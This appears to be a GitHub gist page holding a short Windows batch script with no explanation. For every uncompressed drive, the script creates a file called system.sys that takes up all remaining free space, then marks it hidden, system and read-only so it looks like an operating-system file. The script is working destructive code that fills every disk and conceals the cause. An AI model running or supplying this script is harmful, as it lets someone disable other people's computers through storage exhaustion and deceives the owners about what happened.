Created
August 4, 2016 12:39
-
-
Save hklcf/06c2bdc78f2e10a827310d41d335686b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
for /f "skip=1 tokens=1,2" %%i in ('wmic logicaldisk where "Compressed='FALSE'" get caption^,freespace') do fsutil file createnew %%i\system.sys %%j &attrib +r +a +s +h "%%i\system.sys" | |
cls |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment